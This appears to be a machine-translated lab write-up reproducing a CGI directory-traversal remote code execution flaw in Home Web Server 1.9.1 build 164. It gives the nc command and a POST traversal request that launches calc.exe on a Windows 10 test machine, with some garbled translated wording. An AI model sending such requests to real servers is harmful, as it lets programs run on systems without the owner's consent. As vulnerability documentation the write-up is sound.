First, Home Web Server 1.9.1 build 164-cgi Remote Code execution reproduce
Vulnerability Description:
Home WEB Server allows you to invoke CGI programs to access files under/cgi-bin through a POST request, and then through directory traversal, it is possible to execute any executable program of the remote host.
Vulnerability Impact Range:
Home Web Server 1.9.1 Build 164
Vulnerability Recurrence:
Principle of Use:
The NC connection sends an open calculator request, and the host that installs home Web Server 1.9.1 Build 164 automatically opens the Calculator program.
Environment Construction:
Thunderbolt: Kali-linux-2017.1-vm-amd64 ip:192.168.18.250
Target drone: Windows Version 1703 (x64) ip:192.168.18.112
Install and open Home Web Server 1.9.1 build 164 in the WINDOWS10 system
Using NC to establish a connection in Kali, the command is: NC 192.168.18.112 80
Send POST Request: post/cgi-bin/. /.. /.. /.. /.. /.. /.. /.. /windows/system32/calc.exe http/1.1
When the 400 response is returned, press CTRL + C to terminate the request, and you can see that WINDOWS10 automatically opens the calculator program
Reference Link: https://www.exploit-db.com/exploits/42128/
Home Web Server 1.9.1 build 164-cgi Remote Code Execution replication